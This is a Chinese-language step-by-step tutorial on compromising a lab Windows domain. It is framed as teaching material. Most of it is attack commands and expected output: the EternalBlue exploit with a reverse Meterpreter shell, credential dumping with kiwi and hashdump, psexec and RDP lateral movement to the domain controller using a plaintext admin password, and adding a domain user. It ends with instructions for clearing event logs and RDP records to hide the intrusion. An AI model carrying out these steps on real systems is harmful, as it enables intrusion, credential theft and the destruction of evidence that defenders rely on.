Windows 7 + Windows Server 2008 域环境渗透实战完整教程（详细版・教学专用）

Windows 7 + Windows Server 2008 域环境渗透实战完整教程（详细版・教学专用）

一、教程核心定位与目标

本教程模拟真实内网渗透场景，以 "攻击机打点→拿下客户端→横向移动控域控" 为核心链路，完成从 "边界突破" 到 "内网统治" 的全流程实战。重点覆盖永恒之蓝漏洞利用、Meterpreter 权限操作、域凭证抓取、横向移动、域控接管及痕迹清理等核心技能，适配渗透测试新手入门及教学演示，所有操作均附 "命令 + 目的 + 结果解读"，确保可复现、易理解。

二、前期环境搭建（教学必讲：环境是实战基础）

2.1 环境架构与核心配置

主机角色	系统版本	固定 IP	核心配置要求	备注（教学重点）
攻击机	Kali Linux（≥2023 版）	192.168.10.100	1. 关闭防火墙（ufw disable）；2. 与目标机同网段（VMnet1 仅主机模式）；3. 自带 MSF/Nmap/Crackmapexec	网段互通是前提，否则攻击失败
目标客户端（跳板机）	Windows 7 企业版（SP1，x64）	192.168.10.30	1. 加入 "HACKERPTS" 域（域控 IP：192.168.10.20）；2. 卸载 MS17-010 补丁；3. 关闭防火墙；4. 本地账号 Butcher（空密码）	漏洞补丁未卸载则永恒之蓝攻击失败
目标域控（核心目标）	Windows Server 2008 R2（x64）	192.168.10.20	1. 安装 AD 域服务 + DNS 服务（域名为HACKERPTS.com）；2. DNS 指向自身；3. 域管账号 Administrator，密码 Luxiang@83993939；4. 开启 RDP	DNS 配置错误会导致 Win7 加域失败

2.2 环境连通性校验（前置必做，避免踩坑）

1. Kali 侧 ping 测试：执行 ping 192.168.10.30 和 ping 192.168.10.20，确保丢包率 0%；
2. Win7 侧域连通性：CMD 执行 nltest /dclist:HACKERPTS，能显示域控名称（如 WIN-GKL7OK91MGA）则加域成功；
3. 域控侧服务校验：CMD（管理员）执行 sc query dnsserver 和 sc query netlogon，确保 DNS/NetLogon 服务为 "RUNNING"。

三、核心渗透流程（分步详解，教学重点）

阶段 1：信息收集 ------ 扫描目标端口与漏洞（打点前必做）

目的：明确 Win7 开放端口，定位攻击面（重点关注 SMB 端口 139/445、RDP 端口 3389）。

1. Kali 终端执行端口扫描命令（跳过 ping 检测，避免 Win7 禁 ping 误判）： bash

   运行

   nmap -Pn -p 139,445,3389 192.168.10.30

2. 命令参数解读：

   • -Pn：跳过主机存活检测，直接扫描端口；
   • -p 139,445,3389：指定扫描 SMB 协议核心端口（139/445，永恒之蓝依赖）和 RDP 远程桌面端口（3389）；

3. 理想结果（攻击条件满足）： text

   PORT     STATE SERVICE
   139/tcp  open  netbios-ssn
   445/tcp  open  microsoft-ds
   3389/tcp open  ms-wbt-server

4. 异常处理方案（教学重点，常见坑）：

   • 若 445 端口显示 "filtered"：Win7 防火墙未关，后续可通过 Meterpreter 执行 netsh advfirewall set allprofiles state off 关闭；
   • 若 445 端口显示 "closed"：SMB 服务未启动，Win7 侧 CMD 执行 net start lanmanserver 启动。

阶段 2：漏洞利用 ------MS17-010（永恒之蓝）拿下 Win7

核心原理：利用 Win7 未修复的永恒之蓝漏洞（CVE-2017-0144），远程执行代码并获取 System 权限（Windows 最高权限）。

1. 启动 MSF 攻击框架：Kali 终端执行 msfconsole（等待加载完成，出现 "msf> " 提示符）；

2. 加载永恒之蓝攻击模块： bash

   运行

   use exploit/windows/smb/ms17_010_eternalblue

3. 配置攻击参数（教学时逐行解释，避免死记硬背）：

   • 设置目标 IP（Win7）：set RHOSTS 192.168.10.30；
   • 设置载荷（反弹 Meterpreter Shell）：set PAYLOAD windows/x64/meterpreter/reverse_tcp（x64 对应 Win7 64 位系统）；
   • 设置监听 IP（Kali 自身 IP）：set LHOST 192.168.10.100（确保目标机能回连 Kali）；

4. 发起攻击：执行 exploit，等待命令执行（过程约 10 秒，屏幕会滚动攻击日志）；

5. 攻击成功标志（教学重点，明确结果）：屏幕出现 Meterpreter session 1 opened (192.168.10.100:4444 -> 192.168.10.30:52615) at XXXX-XX-XX XX:XX:XX，提示符变为 meterpreter >，此时已完全控制 Win7。

阶段 3：权限巩固 ------Win7 凭证抓取与 RDP 开启

目的：抓取 Win7 内的域相关凭证（为横向移动到域控做准备），开启 RDP 方便图形化操作。

1. 验证当前权限（教学重点：明确权限级别）：Meterpreter 内执行 getuid，结果显示 Server username: NT AUTHORITY\SYSTEM，确认是最高权限；

2. 加载 Kiwi（Mimikatz 新版，凭证抓取神器）：执行 load kiwi，出现 "Success" 及 Mimikatz 版本信息则加载成功；

3. 抓取所有凭证（重点关注域相关凭证）：执行 creds_all，核心结果解读（教学时标注重点）：

   text

   msv credentials
   ===============
   Username          Domain           NTLM                             
   --------          ------           ----                             
   WIN-EHGFCAJG4QV$  HACKERPTS        958f34ff5fb584fea9fd1e2e745a6e60  （域机器账户Hash）
   wdigest credentials
   ===================
   WIN-EHGFCAJG4QV$  HACKERPTS        cV[xVvqU ',-.'su7D5a...  （域机器账户明文密码）

   注：$结尾的账号是域机器账户，域控自动生成，其凭证可用于域内横向移动；

4. 补充抓取注册表 Hash（避免内存无明文）：执行 hashdump，记录本地管理员（Administrator/Butcher）的 NTLM Hash（格式：账号：ID:LM Hash:NTLM Hash:::）；

5. 开启 Win7 RDP（图形化操作必备）：执行 run post/windows/manage/enable_rdp，提示 "RDP is already enabled" 则说明已开启，同时会自动放行防火墙规则。

阶段 4：横向移动 ------ 利用域控凭证接管 2008 域控

核心逻辑：Win7 已加入 HACKERPTS 域，域管理员（HACKERPTS\Administrator）拥有域内所有机器的最高权限，利用其凭证从 Win7 跳转到域控（横向移动核心思想）。

4.1 方式 1：RDP 远程登录域控（直观，适合教学演示）

1. 退出 Meterpreter 会话（保留后台）：Meterpreter 内执行 background，再执行 exit -y 退出 MSF；

2. Kali 侧启动 RDP 连接（重点讲解账号格式）： bash

   运行

   rdesktop 192.168.10.20 -u HACKERPTS\Administrator -p "Luxiang@83993939"

   • 账号格式：域名\用户名（HACKERPTS\Administrator），而非 "机器名 \ 用户名"，这是新手最易踩的坑；
   • 密码带特殊符号（@）需加引号，避免终端解析错误；

3. 登录成功标志：弹出 2008 域控桌面，可打开 "Active Directory 用户和计算机" 等域管理工具。

4.2 方式 2：Psexec 远程获取域控 CMD（更贴合实战，隐蔽性强）

1. Win7 侧打开 CMD（管理员权限，通过 RDP 登录 Win7 后操作）；

2. 执行远程命令（直接获取域控 CMD）： cmd

   psexec \\192.168.10.20 -u HACKERPTS\Administrator -p Luxiang@83993939 cmd.exe

3. 成功标志：弹出新的 CMD 窗口，标题显示 "\192.168.10.20"，执行 net user /domain 可查看域内所有用户，证明已获取域控权限。

阶段 5：域控权限验证（教学重点：证明完全控制域）

登录域控后，执行以下命令验证域管理员权限，这是 "拿下域控" 的核心证明：

1. 查看域内所有用户：net user /domain；
2. 查看域管理员组（核心权限组）：net group "Domain Admins" /domain；
3. 查看域内所有机器：net view /domain:HACKERPTS；
4. 新增域用户（可选，教学演示权限）：net user testuser Test@123 /add /domain。

四、常见问题与解决方案（教学重点：避坑指南）

问题现象	核心原因	解决方案
RDP 登录提示 "账户已停用"	Win7 本地 Administrator 禁用	改用域账号（HACKERPTS\Administrator）登录，域账号默认不受本地禁用规则限制
RDP 登录提示 "账号 / 密码错误"	账号格式错误	切换到 "其他用户"，输入完整格式：HACKERPTS\Administrator + 正确密码
永恒之蓝攻击提示 "Exploit completed, but no session was created"	Win7 系统版本 / 补丁不匹配	确认 Win7 为 64 位、卸载 MS17-010 相关补丁、更换载荷为 windows/x86/meterpreter/reverse_tcp（32 位）
复制粘贴命令到终端出现乱码	特殊符号转义	手动输入命令（尤其是反斜杠 \、@等符号），避免复制粘贴

五、痕迹清理（贴合 "野蛮人" 风格：来无影去无踪）

核心目标：删除操作日志、清理连接记录，让渗透行为 "无迹可寻"。

5.1 Win7 侧痕迹清理（RDP 登录后操作）

1. 清除系统 / 安全 / 应用程序日志： cmd

   wevtutil cl System
   wevtutil cl Security
   wevtutil cl Application

2. 清理 RDP 连接记录： cmd

   reg delete "HKCU\Software\Microsoft\Terminal Server Client\Default" /f

3. 关闭 Meterpreter 会话（Kali 侧）： bash

   运行

   msfconsole -q -x "sessions -K"

5.2 域控侧痕迹清理（登录域控后操作）

1. 清除域控特有日志（AD/DNS）： cmd

   wevtutil cl "Directory Service"
   wevtutil cl "DNS Server"
   wevtutil cl System
   wevtutil cl Security

2. 清理远程连接 IP 记录： cmd

   reg delete "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "LastClientIP" /f

六、教学核心总结（复习重点）

1. 内网渗透核心链路：打点（拿下边界机 Win7）→ 凭证抓取 → 横向移动（控域控）→ 权限维持 / 痕迹清理；
2. 域环境关键规则：域管理员账号可访问域内所有机器，这是横向移动的核心依据；
3. 新手避坑重点：RDP 账号格式（域名 \ 用户名）、命令特殊符号处理、日志清理的必要性；
4. 实战核心思想：权限是渗透的核心，System 权限（Win7）→ 域管理员权限（域控）是内网渗透的终极目标。